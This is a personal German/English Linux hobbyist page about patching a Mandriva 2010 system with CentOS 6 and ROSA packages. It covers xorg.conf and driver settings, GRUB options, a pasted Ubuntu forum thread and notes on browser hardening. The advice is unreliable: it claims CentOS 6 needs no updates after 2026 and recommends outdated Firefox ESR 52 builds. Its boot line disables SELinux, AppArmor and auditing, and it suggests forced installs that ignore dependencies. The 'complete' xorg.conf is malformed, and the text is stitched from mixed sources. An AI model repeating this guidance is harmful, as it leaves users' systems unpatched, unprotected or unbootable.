mdv2010 (bzw. mdv2007 oder mdk2004). CentOS 6 erweckt bereits heute nach sechs Jahren den Eindruck, es sei abgesehen von Firefox, gnutls und Openssl zu Ende geupdatet und gepatcht. Nach dem Jahr 2026 sind daher aller Vorraussicht nach überhaupt keine Updates mehr erforderlich, nur Spinner, die meinen, es handele sich danach (spätestens nach 2026) mit Updates tatsächlich noch um ebensolche, glauben das nicht: "15. Feb 2016 Preisgabe von Informationen in libgcrypt", Quelle: pro-linux.de. Sie sehen: Ob openssl, ob gnutls, ein Patch erfolgt spät, viel zu spät! Toll: Auch dmesg indiziert nun keine Fehler mehr! Imfalle von sich nicht weiter auswirkenden Loops beim Herunterfahren des Systems nach der Updatephase deinstalliere, modifiziere oder verfollständige man zugehörige Pakete (man sollte hier nicht verzweifeln). U.U. sind zugehörige Pakete wieder zu downgraden. Loops zeigen an, dass irgendein Service bzw. Daemon nicht richtig startet. Zum selbsttätigen Lösen von Loops gibt es ein spezielles Programm. das wir unten noch aufführen. libbsd (el6, "Das Paket libbsd verschafft nützliche Funktionen von BSD-Systemen, die bei Systemen wie GNU basierten vermisst werden, obwohl sie das Portieren von Projekten mit BSD-Ursprung ohne erforderliche Integration erleichtern."), "Ragel (el7, Russian Fedora) compiles finite state machines from regular languages into executable C, C++, Objective-C, or D code. Ragel state machines can not only recognize byte sequences as regular expression machines do, but can also execute code at arbitrary points in the recognition of a regular language. Code embedding is done using inline operators that do not disrupt the regular language syntax", pkgs.org Zeit synchronisieren mit ntp (el6) Echtzeituhren eines modernen PCs haben teilweise eine geringere Genauigkeit als beispielsweise eine Werbegeschenk-Armbanduhr. Dieser Artikel beschreibt den automatischen Abgleich der Systemuhr: http://www.pool.ntp.org/de/use.html .core-Dateien: Nicht nur das zu mdv2010.2 von el6 aufgenommene prosody (el6, rosa2014.1) hinterlässt im aktuellen Verzeichnis bei Problemen mit der Speicherverwaltung pro Aufruf eine auslagernde .core-Speicherabzugs-Datei zur Benachrichtigung. Diese Datei darf wieder gelöscht werden. Dienste aktivieren und abstellen: MCC -> System -> Dienste, chkconfig oder x11-freundliches ntsysv oder systemd (auf systemd haben wir verzichtet) oder manuell wie bei Linux-Slackware durchaus üblich mit: "sh /etc/init.d/servicename start" ( resp. stop or restart).. Stormbaacoureur: das 3D-Auto-Geschicklichkeitsspiel sollte bei Farb- und Kontrastfehlern mit der Option -indirect gestartet werden. Games: SDL-games u.a. (rosa2014.1), infrage kommende Vollbild-Fullscreen-Auflösungen für unter Datenblatt aufgeführten TFT von AOC sind u.a. 4096×1092, ..., 1366×786 (automatic), 1366×704, 1360×704; or 1280×720. marsshooter (mdv2010.2): läuft merkwürider Weise nicht mit jedem ersten Aufruf von Terminal, was sich aber mit marsshooter (rosa2014.1) legt. UEFI: UEFITool (rpm, u.a. von OpenSuSE 13.1) pkgs.org: "UEFITool is a cross-platform C++/Qt program for parsing, extracting and modifying UEFI firmware images. It supports parsing of full BIOS images starting with the flash descriptor or any binary files containing UEFI volumes. Original development was started at MDL forums as a cross-platform analog to PhoenixTool´s structure mode with some additional features, but the program´s engine was proven to be useful for another projects like UEFIPatch, UBU and OZMTool." Damit scorched3d läuft, reinstalliere man lib64wxgtk (mdv2010.1). Office: libreoffice (el6), OpenOffice (mdv2010.2), koffice (mdv2010.2, neben calligra (ab mdv2011) mit kword (Textverarbeitung), kspread (Tabellenkalkulation), kformula (mathematischer Formeleditor), kchart (integrierte Chart-Diagramme), kplato (Projektmanagement, die Grantt-style-charts erzeugen kann), kpresenter (Präsentation), krita (Zeichnen-/Malprogramm und Bildverarbeitung), kugar (Report-Generator), karbon (Vektor-Zeichnenprogramm), kivio (Flussdiagramme) und kexi ( lokale Datenbank ), aber auch libreoffice (el6, el7, rosa2014.1, mdv2010.2) und openoffice (rosa2014.1, mdv2010.2 oder aktuell von openoffice.org, ganz ähnlich koffice und libreoffice wieder mit Textverarbeitung, Tabellenkalkulation, Präsentation, Zeichnung, Datenbank, Formeln und jeder Menge Vorlagen ) Der 99-fach gepatchte Release des NetworkManager (el6) arbeitet einwandfrei, erzeugt aber zur Zeit noch eine Fehlermeldung beim Herunterfahren des Systems. Diese wirkt sich nicht aus. Bis zum Patch lässt sie sich in /etc/init.d/Networkmanager mit Änderungen unter stop() unterdücken. Ansonsten kommt es unsers Wissens nach all den Updates zu keinen Fehlermeldungen, weder beim Hoch- noch Herunterfahren oder Starten irgendwelcher Programme. Nepomuk: wird KDE-4.4.5 (mdv2010.2) beibehalten, kann man trotzdem folgende Pakete von Nepomuk updaten: lib64nepomukcore4 (rosa2014.1), lib64nepomukutils (rosa2014.1), lib64nepomukwidgets (rosa2014.1), lib64smokebase3 (rosa2014.1, Installation mit rpm -i --force --nodeps), lib64smokenepomuk3 (rosa2014.1) und lib64smokenepomukquery3 (rosa2014.1), wer will, auch shared-desktop-ontologies (el7), hIngegen nicht lib64nepomuk4 (rosa2014.1). MySQL: rosa 2014.1 mit lib64mysqlclient18, lib64mysqld oder el6, el7 (anschließend imfalle der lokalen Nutzung /usr/libexec/mysqld für Akonadi mittels akonaditray eintragen) Listing (Auszug) unter Veweis auf davon neueste Updates: http://fr2.rpmfind.net/linux/RPM/centos/updates/6.7/x86_64/Unknown.html Lautsprechertest: speaker-test Scanner: sane-backends (el6), sane-backend-libs (el6), xsane (el6), xsane-common (el6), xsane-gimp (el6) Systemd für die Dienstverwaltung, Dienste bzw. Hintergrundprogramme oder auch Daemons blieb hier wegen MCC -> Dienste und dem terminalbasiertem (x11-freundlichem) ntsysv (el7, el6), immer auch chkconfig, ohne Verwendung, ansonsten systemd (el7, pclos, mdv2011, mga1, mga2, mga3, rosa2012.1, omv2015 oder rosa2014.1) SDL2 (rosa2014.1) precedent of SDL1 (rosa2014.1) can be obtained from internet too / als Nachfolger von SDL1 (rosa2014.1 or Tarballs) kann man sich im Internet von http://libsdl.org besorgen, SDL1 reicht aber für rosa2014.1/mdv2010-Games aus. [solved by Gooken: msec-gui (mdv2010 bis mdv2012, mga5 und rosa2014.1) aus MCC von mdv2010.2 startet nicht ] Ausfall nach all den Updates: Mandrivas hauseigenes msec-gui (msecgui.py von mdv2010 bis mdv2012, mga1 bis mga5 und rosa2014.1, Datei: /usr/share/msec/msecgui.py) innerhalb MCC beendet sich vorzeitig vor dem Erscheinen. msec funktioniert aber weiterhin, auch rosa2014.1. Sogar die Games laufen noch allesamt! Fehlermeldung msecgui.py: "ERROR: Attempt to add property GtkSettings::gtk-button-images after class was initialised." Also: ERROR mit Abbruch (!) statt WARNUNG. Die erteilte GLib-GObject-WARNUNG beruht dabei angeblich auf einer Änderung des aktuellen gtk+ Abhilfe: nano /usr/share/msec/msecgui.py, nun mit Eintrag: . import warnings warnings.filterwarnings("ignore") anstelle warnings.filterwarnings("error"). (Diese Lösung beruht auf eine Anregung von http://stackoverflow.com/questions/20708657/python-gtk-how-to-suppress-warnings). Nun kann man (vor einer erneuten Korrektur) sogar msec-gui und msec von mga5 oder rosa2014.1 installieren. ... kleines X11-Server-Troubleshooting (nur sofern Sie diesen Text mit ihrem Computerbildschirm jetzt noch lesen können): Die Logdatei /var/log/xorg.0.log gibt meist Auskunft. Bereits die Anzahl zu installierender X11-Pakete liegt bei unvergleichlich um die 50, darunter 10 Bibliothekspakete, daher genau informieren, welche Pakete benötigt werden. Meistens lohnen sich Änderungen in der Konfigurationsdatei: nano /etc/X11/xorg.conf. Dort kann man zur Not den Standardtreiber "fbdev" oder "vesa" eintragen, ansonsten bleibe man bei der Graphikkarte und ihrem Hersteller. Bei einem Update und Upgrade von X11 verwahre man alle Pakete der Vorgängerversion gut auf. drm: Treiberpaket nachinstallieren. Weitere Möglichkeiten zur Fehlerbehebung geben natürlich auf dienliche Webseiten verweisende Suchmaschinen. Loggt man sich als Root im Terminalmodus ein, kann dialog auch bei richtiger Treiberkonfiguration erneut eine Abfrage der Treibereinstellungen starten. Um sie zu unterbrechen, drücke man ganz einfach kurz die Windows-Taste. [solved by Gooken: Programme wie scorched3d starten nicht mehr. Stattdessen geben sie folgende Fehlermeldungen aus: ] /usr/games/scorched3d: Symbol ´_ZTV12wxBufferedDC´ has different size in shared object, consider re-linking /usr/games/scorched3d: Symbol ´_ZTV10wxClientDC´ has different size in shared object, consider re-linking /usr/games/scorched3d: Symbol ´_ZTV10wxMemoryDC´ has different size in shared object, consider re-linking /usr/games/scorched3d: Symbol ´_ZTV17wxBufferedPaintDC´ has different size in shared object, consider re-linking Fatal Error: Mismatch between the program and library build versions detected. The library used 2.8 (no debug,Unicode,compiler with C++ ABI 1002,wx containers,compatible with 2.4,compatible with 2.6), and your program used 2.8 (no debug,Unicode,compiler with C++ ABI 1002,wx containers,compatible with 2.6). gtk und gdk sind geupdatet worden. Installiere daher alle Pakte mit Namen lib64wxGTK (mdv2010.1) und lib64wxpython (mdv2010.1). Danach starten Anwendungen wie scorched3d wieder. [solved by Gooken:Miroplayer und gramps starten nicht und zeigen Fehlermeldungen mit python-Dateien (.py): ] In diesem Fall sind die Versionen von el6 zu installieren, sollten sie dennoch nicht starten, nachträlgich alle llib64gtk- und lib64gdk-Pakete. Ggfls. installiere man wieder Python (mdv2010.1 und mdv2010.2). Hier die Liste der für den X11-Server aus Graphikkartentreiber, Maus, Tastatur, Mauspad, Touchscreen usw. von el6 getesteten Pakete, hier klicken. Linux-Geräte unter /dev: fd0 Das erste Diskettenlaufwerk fd1 Das zweite Diskettenlaufwerk sda Die erste Festplatte sdb Die zweite Festplatte sdc Die dritte Festplatte sda1 Die erste Partition auf der ersten Festplatte sdb7 Die siebte Partition auf der zweiten Festplatte sr0 Das erste CD-ROM-Laufwerk sr1 Das zweite CD-ROM-Laufwerk ttyS0 Der erste serielle Port (Port 0, unter MS-DOS COM1 genannt) ttyS1 Der zweite serielle Port (Port 1, unter MS-DOS COM2 genannt) psaux PS/2-Maus gpmdata Pseudo-Gerät, das Daten vom GPM-(Maus-)Daemon überträgt cdrom Symbolischer Link zum CD-ROM-Laufwerk mouse Symbolischer Link zur Gerätedatei der Maus null Alles, was an dieses Gerät geschickt wird, verschwindet zero Man kann endlos Nullen von diesem Gerät lesen psmouse PS/2-Maus (sollte automatisch erkannt werden) usbhid USB-Maus (sollte automatisch erkannt werden) sermouse Die meisten seriellen Mäuse logibm Bus-Maus, die an eine Logitech-Adapterkarte angeschlossen ist inport Bus-Maus, die an eine ATI oder Microsoft InPort-Karte angeschlossen ist Tastatur und Maus werden i.a. von hal automatisch konfiguriert, vom MCC unter Maus/Zeigegeräte, mit systemsettings, gnome-control-center oder manuell zeilenweise in der Datei /etc/X11/xorg.conf, hier für herkömmliche PS/2-Maus mit Scrollrad: Section "InputDevice" Identifier "Mymouse1" Driver "mouse" Option "CorePointer" # Option "Device" "/dev/psaux" # Option "Device" "/dev/ttyS0" Option "Device" "/dev/input/mice" # Option "Device" "/dev/ttyS0" Option "Protocol" "ImPS/2" # Option "Protocol" "Auto" # Option "Protocol" "ExplorerPS/2" # Option "Protocol" "auto" Option "ZAxisMapping" "4 5" Option "Emulate3Buttons" "true" EndSection /etc/X11/xorg.conf (vollständig), um das System mausklick-schnell zu machen, darunter der Graphikkartentreiber: # File generated by XFdrake (rev ), explanation: https://wiki.archlinux.org/index.php/ATI, https://wiki.archlinux.org/index.php/Intel, ... # *************************** # Refer to the xorg.conf man page for details about the format of # this file. # *************************** Section "ServerFlags" Option "DontZap" "True" # disable Ctrl Alt BS (server abort) #DontZoom # disable <Ctrl><Alt><KP_+>/<KP_-> (resolution switching) AllowMouseOpenFail # allows the server to start up even if the mouse does not work Option "DontVTSwitch" "True" EndSection Section "Module" Load "dbe" # Double-Buffering Extension Load "v4l" # Video for Linux Load "type1" Load "freetype" Load "extmod" Load "glx" # 3D layer Load "dri" # direct rendering EndSection Section "Files" ModulePath "/usr/lib64/xorg/modules" ModulePath "/usr/lib64/xorg/modules/extensions" FontPath "/usr/share/fonts/X11/misc" FontPath "/usr/share/fonts/X11/cyrillic" FontPath "/usr/share/fonts/X11/100dpi/:unscaled" FontPath "/usr/share/fonts/X11/75dpi/:unscaled" FontPath "/usr/share/fonts/X11/Type1" FontPath "/usr/share/fonts/X11/100dpi" FontPath "/usr/share/fonts/X11/75dpi" FontPath "/var/lib/defoma/x-ttcidfont-conf.d/dirs/TrueType" FontPath "built-ins" EndSection Section "Monitor" Identifier "Monitor1" HorizSync 47.7 # genauer Wert: gegen Bild-Unsch&aum;rfe; SDL: Für Fullscreen Toleranz ggfls. ausweiten, aber Vorsicht: Das BIOS kann damit ausfallen oder zerstört werden VertRefresh 59.8 # gegen Bild-Unschärfe; SDL: Für Fullscreen Toleranz ggfls. ausweiten DisplaySize 361 203 # xdpyinfo | grep -B2 resolution # Monitor preferred modeline (59.8 Hz vsync, 47.7 kHz hsync, ratio 16/9, 84 dpi) ModeLine "1366x768" 85.5 1366 1436 1579 1792 768 771 774 798 +hsync +vsync # modeline generated by gtf(1) [handled by XFdrake] ModeLine "1280x720_60" 74.48 1280 1336 1472 1664 720 721 724 746 -HSync +Vsync # modeline generated by gtf(1) [handled by XFdrake] ModeLine "1280x720_50" 60.47 1280 1328 1456 1632 720 721 724 741 -HSync +Vsync EndSection Section "Monitor" Identifier "Monitor2" HorizSync 45-55# SDL: für Fullscreen ausweiten VertRefresh 55-65 # SDL: für Fullscreen ausweiten VendorName "Monitor Vendor" ModelName "Monitor Model" EndSection Section "Monitor" Identifier "Monitor3" HorizSync 47.7; SDL: für Fullscreen ausweiten VertRefresh 59.8; SDL: für Fullscreen ausweiten VendorName "Monitor Vendor" ModelName "Monitor Model" EndSection Section "Monitor" Identifier "Monitor4" HorizSync 47.7; SDL: für Fullscreen ausweiten VertRefresh 59.8; SDL: für Fullscreen ausweiten VendorName "Monitor Vendor" ModelName "Monitor Model" EndSection Section "Device" Identifier "Device1" VendorName "Intel Corporation" BoardName "Intel 810 and later" Driver "intel" BusID "PCI:0:2:0" Screen 0 ### Available Driver options are:- ### Values: <i>: integer, <f>: float, <bool>: "True"/"False", ### <string>: "String", <freq>: "<f> Hz/kHz/MHz", ### <percent>: "<f>%" ### [arg]: arg optional Option "DPMS" # Option "ShadowPrimary" "on" Option "ZaphodHeads" "VGA1" # Option "AccelMethod" "sna" # Option "AccelMethod" "exa" Option "AccelMethod" "glamor" # Option "AccelMethod" "uxa" # Option "AccelMethod" "glamour" Option "MigrationHeuristic" "greedy" #Option "EXAPixmaps" "off" Option "DRI" "true" Option "DRI" "3" # Option "DRI" "2" Option "TearFree" "on" Option "ColorTiling" "on" Option "ColorTiling2D" "on" Option "EnablePageFlip" "on" #Option "NoAccel" # [<bool>] #Option "AccelMethod" # <str> #Option "Backlight" # <str> #Option "ColorKey" # <i> #Option "VideoKey" # <i> #Option "Tiling" # [<bool>] #Option "LinearFramebuffer" # [<bool>] #Option "SwapbuffersWait" # [<bool>] #Option "XvPreferOverlay" # [<bool>] #Option "HotPlug" # [<bool>] #Option "RelaxedFencing" # [<bool>] #Option "XvMC" # [<bool>] #Option "Throttle" # [<bool>] #Option "DelayedFlush" # [<bool>] #Option "TearFree" # [<bool>] #Option "PerCrtcPixmaps" # [<bool>] #Option "FallbackDebug" # [<bool>] #Option "DebugFlushBatches" # [<bool>] #Option "DebugFlushCaches" # [<bool>] #Option "DebugWait" # [<bool>] #Option "BufferCache" # [<bool>] #Option "TripleBuffer" # [<bool>] #Option "SWcursor" # [<bool>] #Option "kmsdev" # <str> #Option "ShadowFB" # [<bool>] #Option "Rotate" # <str> Option "fbdev" "on" #Option "debug" # [<bool>] #Option "ShadowFB" # [<bool>] #Option "DefaultRefresh" # [<bool>] #Option "ModeSetClearScreen" # [<bool>] EndSection Section "Device" #Option "SWcursor" # [<bool>] #Option "kmsdev" # <str> #Option "ShadowFB" # [<bool>] Identifier "Device2" Driver "modesetting" BusID "PCI:0:2:0" Screen 0 EndSection Section "Device" #Option "ShadowFB" # [<bool>] #Option "Rotate" # <str> #Option "fbdev" # <str> #Option "debug" # [<bool>] Identifier "Device3" Driver "fbdev" BusID "PCI:0:2:0" Screen 0 EndSection Section "Device" #Option "ShadowFB" # [<bool>] #Option "DefaultRefresh" # [<bool>] #Option "ModeSetClearScreen" # [<bool>] Identifier "Device4" Driver "vesa" BusID "PCI:0:2:0" Screen 0 EndSection Section "Screen0" Identifier "Screen0" Device "Device1" Monitor "Monitor1" DefaultColorDepth 24 Section "Screen2" Identifier "Screen2" Device "Device2" Monitor "Monitor2" SubSection "Display" Viewport 0 0 Depth 1 EndSubSection SubSection "Display" Viewport 0 0 Depth 4 EndSubSection SubSection "Display" Viewport 0 0 Depth 8 EndSubSection SubSection "Display" Viewport 0 0 Depth 15 EndSubSection SubSection "Display" Viewport 0 0 Depth 16 EndSubSection SubSection "Display" Viewport 0 0 Depth 24 EndSubSection EndSection Section "Screen" Identifier "Screen3" Device "Device3" Monitor "Monitor3" SubSection "Display" Viewport 0 0 Depth 1 EndSubSection SubSection "Display" Viewport 0 0 Depth 4 EndSubSection SubSection "Display" Viewport 0 0 Depth 8 EndSubSection SubSection "Display" Viewport 0 0 Depth 15 EndSubSection SubSection "Display" Viewport 0 0 Depth 16 EndSubSection SubSection "Display" Viewport 0 0 Depth 24 EndSubSection EndSection Section "Screen" Identifier "Screen4" Device "Device4" Monitor "Monitor4" SubSection "Display" Viewport 0 0 Depth 1 EndSubSection SubSection "Display" Viewport 0 0 Depth 4 EndSubSection SubSection "Display" Viewport 0 0 Depth 8 EndSubSection SubSection "Display" Viewport 0 0 Depth 15 EndSubSection SubSection "Display" Viewport 0 0 Depth 16 EndSubSection SubSection "Display" Viewport 0 0 Depth 24 EndSubSection EndSection Subsection "Display" Depth 24 Modes "1366x768" "1360x765" "1280x720" "1024x768" EndSubsection EndSection Section "ServerLayout" Identifier "layout1" Screen "Screen0" InputDevice "Keyboard0" "CoreKeyboard" InputDevice "Mymouse1" "CorePointer" EndSection Section "ServerLayout" Identifier "layout2" Screen "Screen2" InputDevice "Keyboard0" "CoreKeyboard" InputDevice "Mymouse1" "CorePointer" EndSection Section "ServerLayout" Identifier "layout3" Screen "Screen3" InputDevice "Keyboard0" "CoreKeyboard" InputDevice "Mymouse1" "CorePointer" EndSection Section "ServerLayout" Identifier "layout4" Screen "Screen4" InputDevice "Keyboard0" "CoreKeyboard" InputDevice "Mymouse1" "CorePointer" EndSection Section "InputDevice" Identifier "Mymouse1" Driver "mouse" # Option "Device" "/dev/ttyS0" Option "Protocol" "ImPS/2" # Option "Device" "/dev/psaux" # Option "Device" "/dev/ttyS0" Option "Device" "/dev/input/mice" Option "Emulate3Buttons" "true" Option "CorePointer" # Option "Protocol" "Auto" # Option "Protocol" "ExplorerPS/2" # Option "Protocol" "auto" Option "ZAxisMapping" "4 5" # Option "ZAxisMapping" "4 5 6 7" EndSection Section "InputDevice" # generated from default Identifier "Keyboard0" Driver "kbd" Option "CoreKeyboard" Option "XkbRules" "xorg" Option "XkbModel" "pc105" Option "XkbLayout" "de" EndSection Power Management: /etc/udev/rules.d/30-intel-pm.rules KERNEL=="dri/card0", SUBSYSTEM=="drm", DRIVERS=="intel", ATTR{device/power_method}="profile", ATTR{device/power_profile}="high" intel.audio=1 intel.modeset=1 intel.dpm=1 in /boot/grub/menu.lst kernel (hd0,1)/vmlinuz-5.4.249-pclos1 BOOT_IMAGE=5.4.249-pclos1 root=UUID=... rootfstype=ext4 elevator=deadline security=none speedboot=yes intel.audio=1 intel.modeset=1 intel.dpm=1 apparmor=0 selinux=0 audit=0 nosmp iomem=strict hibernate=protect_image disable=IPV6 KEYMAP=de LANG=de_DE.UTF-8 rd.luks=1 rd.multipath=0 rd.dm=0 rd.lvm=0 rd.md=0 rd.luks.allow-discards rd.luks.uuid=... desktop=kde tz=Europe/Berlin video=VGA-1:1366x768 vga=795 /etc/drirc <driconf> <!-- Please always enable app-specific workarounds for all drivers and screens. --> <device driver="i915"> <application name="Default"> <option name="stub_occlusion_query" value="true" /> <option name="fragment_shader" value="true" /> </application> ... </driconf> ~/.drirc <driconf> <device screen="0" driver="i915"> <application name="Default"> <option name="force_s3tc_enable" value="true" /> <option name="no_rast" value="false" /> <option name="always_flush_cache" value="true" /> <option name="shader_precompile" value="true" /> <option name="always_flush_batch" value="true" /> <option name="bo_reuse" value="1" /> <option name="vblank_mode" value="3" /> <option name="force_glsl_extensions_warn" value="true" /> <option name="disable_throttling" value="true" /> <option name="disable_glsl_line_continuations" value="true" /> <option name="disable_blend_func_extended" value="true" /> <option name="early_z" value="false" /> </application> <application name="Unigine Sanctuary" executable="Sanctuary"> <option name="force_s3tc_enable" value="true" /> <option name="force_glsl_extensions_warn" value="true" /> <option name="disable_blend_func_extended" value="false" /> <option name="vblank_mode" value="3" /> <option name="always_flush_cache" value="true" /> </application> <application name="Unigine Tropics" executable="Tropics"> <option name="force_s3tc_enable" value="true" /> <option name="force_glsl_extensions_warn" value="true" /> <option name="disable_blend_func_extended" value="false" /> </application> <application name="Unigine Heaven (32-bit)" executable="heaven_x86"> <option name="force_glsl_extensions_warn" value="true" /> <option name="disable_blend_func_extended" value="true" /> </application> <application name="Unigine Heaven (64-bit)" executable="heaven_x64"> <option name="force_glsl_extensions_warn" value="true" /> <option name="disable_blend_func_extended" value="true" /> </application> <application name="Unigine Valley (32-bit)" executable="valley_x86"> </application> <application name="Unigine Valley (64-bit)" executable="valley_x64"> </application> <application name="Unigine OilRush (32-bit)" executable="OilRush_x86"> <option name="disable_blend_func_extended" value="true" /> </application> <application name="Unigine OilRush (64-bit)" executable="OilRush_x64"> <option name="disable_blend_func_extended" value="true" /> </application> <application name="Savage 2" executable="savage2.bin"> <option name="disable_glsl_line_continuations" value="true" /> </application> <application name="Topogun (32-bit)" executable="topogun32"> </application> <application name="Topogun (64-bit)" executable="topogun64"> </application> <application name="Dead Island" executable="DeadIslandGame"> </application> <application name="Second Life" executable="do-not-directly-run-secondlife-bin"> </application> </device> </driconf> /etc/modprobe.de/i915.conf options i915 enable_fbc=1 options i915 enable_guc=2 options i915 fastboot=1 /etc/environment COGL_ATLAS_DEFAULT_BLIT_MODE=framebuffer modul (graphic card driver) are named vesa (norm for the case you don´t know), fbdev (one more standard driver for the case other ones do not work), vga, vga16, uncommon, dummy (dummy card, for the case you don´t know), intel, nv (nvidia), nvidia173, nvidia96xx, nvidia-current, ati (ATI, Radeon Rage, RagePro, ...), r128 (ATI Rage128), amdgpu, radeon, radeonhd (also many amdgpu), radeon (AMD with previous ATI), fglrx (AMD/ATI Radeon 2000 and higher, ..., includes the popular AMD-/ATI-proprietary driver named catalyst), trident, nv (nvidia), nouveau (nvidia), dummy, matrox, i2cmatrox, riva, sst, neo, hga, sst, s3, savage, virge, cirrus, openchrome (including unichrome drivers), sis, sisdrv (sis), sisimedia (sis), v4l, vga, xgixp, uncommon mit: tga, tseng, voodoo, siliconmotion, rendition, newport, apm, ark, chips Packets for many graphic card driver: X11, xorg, x11-driver-video-modulname (mdv, mga, rosa) resp.. xorg-x11-drv->modulname< (el6, el7), radeon-firmware (rosa2014.1, rosa2016.1; already included within packet kernel-firmware or kernel), libdrm (el6), mesa (el6, el7, fc, ..., OpenGL-Treiber), packets for X11 in detail (el6, rosa, mdv) see the listing in our section "Universal Linux 2010" - Updates; akmod-catalyst, kmod-catalyst (fc21), xorg-x11-driver-catalyst (fc21), xorg-x11-driver-catalyst-libs (fc21) or x11-video-drivers-fglrx (mdv, rosa), dkms (mdv), dkms-fglrx (mdv), fglrx-control-center (mdv, mga, rosa), xf86-video-fbdev (arch-linux), xf86-video-vesa (arch-linux), nvidia-utils (arch-linux), lib64-nvidia-utils (arch-linux), nvidia-390xx (arch-linux), nvidia-390xx-utils (ach-linux), lib64-nvidia-390xx-utils (arch-linux), nvidia-340xx (arch-linux), nvidia-340xx-utils (arch-linux), lib64-nvidia-340xx-utils (arch-linux) The Linux kernel includes open-source video drivers and support for hardware accelerated framebuffers. However, userland support is required for OpenGL and 2D acceleration in X11. First, identify your card: lspci | grep -e VGA -e 3D Then install an appropriate driver. You can search the package database for a complete list of open-source video drivers: rpm -i --force xf86-video # Arch Linux Xorg searches for installed drivers automatically: If it cannot find the specific driver installed for the hardware (listed below), it first searches for fbdev (xf86-video-fbdev). If that is not found, it searches for vesa (xf86-video-vesa), the generic driver, which handles a large number of chipsets but does not include any 2D or 3D acceleration. If vesa is not found, Xorg will fall back to kernel mode setting, which includes GLAMOR acceleration (see modesetting(4)). In order for video acceleration to work and often to expose all the modes, that the GPU can set, a proper (resp. proprietary - manufacturer) video driver is required: ... https://wiki.archlinux.org/index.php/xorg https://wiki.archlinux.org/index.php/ATI generate xorg.conf from current configuration Oh man, would that be helpful! Does the logfile help you at all? Code: /var/log/Xorg.0.log I´m pulling my hair out trying to get an old laptop going because Xorg & HAL aren´t able to auto-detect the display´s available resolutions properly (for whatever reason). So, I´m looking around trying to piece together which bits I need from the automatically detected configuration, and which bits I need to supply. I have been looking at the logfile and while it doesn´t supply a ready formatted, complete xorg.conf it will give you a lot of details to generate one from. But I´m still looking for a better solution... Advanced reply Adv Reply May 14th, 2010 #4 Gatemaze Distro Ubuntu 10.04 Lucid Lynx Re: generate xorg.conf from current configuration Thanks P&C, it is some progress... but still a "write_xorg" of the current configuration would be ideal Advanced reply Adv Reply May 19th, 2010 #5 Distro Ubuntu 9.10 Karmic Koala Re: generate xorg.conf from current configuration I´ve spent some more time looking at this and it would appear that it is possible afterall... In my case, (Ubuntu 9.10) I booted into the recovery mode and ran Code: Xorg -configure This tells you that it generates the configuration file: /root/xorg.conf.new It also says that running the following will test it: Code: X -config /root/xorg.conf.new However, in my case I was pleasantly greated with black text on a black background with a black cursor - either that or it didn´t work... 2nd time around: Code: cp /root/xorg.conf.new /etc/X11/xorg.conf shutdown -r now This appears to startup my laptop "normally", so I now have a configuration file to start playing with. I have yet to check the logfile, etc, but I thought it answered your original post, so I thought I´d post asap. Hope it helps you (or anyone else!) out... https://ubuntuforums.org/showthread.php?t=1478310 Portability, new platform or graphic card: One worse thing, that can happen, and this is a nightmare: a darkscreen (ASUS ITX 220): Graphic cards themselves seldom get out of order. Exchange the CMOS-battery and/or unplug the BIOS-chip out of its socket to plug it into again (even think of a spare parted BIOS-chip). Also make a copy of xorg.conf like xorg-save.conf and preconfigure files with MCC -> graphic card for different cards and standard driver vesa, fbdev and fglrx. Test and save each new created pre-configuration file xorg.conf to xorg-nv.conf, xorg-ati.conf, ..., xorg-vesa.conf, xorg-fbdev.conf and xorg-fglrx.conf. The best thing one can do is to order one more graphic card of same manufacturer to keep it spare-parted. The graphic card drivers itself can be found in /usr/lib64/xorg/modules/drivers (or any subdirectory). If the methods above do not help, that means if testing fails, just rename the graphic card drivers in right this directory or a subdirectory depending on the location (of the driver), after a new graphic card is plugged or in use, while /etc/xorg.conf with the named old driver remained still unchanged by module name. Other parts of /etc/X11/xorg.conf should be tuned well instead - following the through MCC preconfigured xorg-xxx.conf from above. In the normal case, the X-server creates a new /etc/X11/xorg.conf belonging to the any graphic card automatically after it got deleted (removed), but one can not guarantee, he really does .... Ihnen wird wie folgt entgegnet: - JavaScript bleibt aktivert. In diesem Fall empfehlen sich in Kürze vorgestellte Browser-Extensions (ScriptBlocker) wie für Firefox. Die Konfiguration (Einstellung) dieser Extensions wird auf dieser Webseite bald noch vorgestellt. - JavaScript bleibt ggfls. aktiviert: Der Browser, zumindest die Profildateien etc. (bei Firefox in einem Home-Verzeichnis unter .mozilla), befindet sich auf der Home-, noch besser einer eigenen kleinen Partition, die sich in /etc/fstab, dort obendrein mit der Option "noexec", , oder mit dem Befehl "mount -o remount ro Partitions-Device-Datei" readonly mounten lässt. Man teste, ob er dann noch startet. - Setzen von ACL-Zugriffsrechten (setfacl) innerhalb des Home-Verzeichnisses von surfuser: setfacl -m u:surfuser:r-x /home/surfuser, setfacl -m u:surfuser:r-x /home/surfuser/.mozila, setfacl -m u:surfuser:r-x /home/surfuser/.mozilla/firefox usw. (beachte: Dies ist nicht auf allen Verzeichnissen innerhalb des Home-Verzeichnisses mölglich). - Gang auf Nummer sicher: Deaktivierung von JavaScript (sofern die Darstellung und Aktionen der Webseiten dadurch nicht unnötig restriktriert werden) Alle auf dieser Seite von grünem Haken zu grünem Haken aufgeführten Punkte sollten befolgt und Linfw3 muss eingesetzt werden. Man installiere danach nur OpenSource Software aus vertraulichen Quellen (Paket-Signatur- und Prüfsummencheck). Gegebenenfalls führe man hierzu unmittelbar nach der Paketinstallation noch einen Virenscan durch. FirefoxESR-52.9.0 ftp://ftp.pbone.net/mirror/ftp5.gwdg.de/pub/opensuse/repositories/home:/ linux4humans:/sle11_software:/firefox/openSUSE_Evergreen_11.4/ x86_64/MozillaFirefox-52.9.0-10.2.x86_64.rpm from 02/2019 https://slackware.pkgs.org/14.0/salix-x86_64/mozilla-firefox-52.9.0esr-x86_64-1gv.txz.html (slack14.0) http://download.salixos.org/x86_64/14.0/salix/xap/mozilla-firefox-52.9.0esr-x86_64-1gv.txz (slack14.0) https://fr2.rpmfind.net/linux/mageia/distrib/6/x86_64/media/core/updates/firefox-52.9.0-1.mga6.x86_64.rpm https://rpm.pbone.net/index.php3/stat/4/idpl/54051369/dir/opensuse_leap_15/com/MozillaFirefox-52.9.0-lp150.5.1.x86_64.rpm.html https://rpm.pbone.net/index.php3/stat/4/idpl/55298083/dir/opensuse/com/MozillaFirefox-52.9.0-4.5.x86_64.rpm.html Firefox-ESR-52.8.1 (el6, fr2.rpmfind.net) Sicherheits-Warnungen vor Firefox-Erweiterungen WOT, disconnect, Ghostery, ... Einzelheiten siehe News&Links#Computer Brian Krebs: Sicherheits-Experte warnt: Darum sollten sie (fast) keine Browser-Erweiterungen nutzen, STERN.de, 08.03.2020 Mit Extensions lassen sich Browser wie 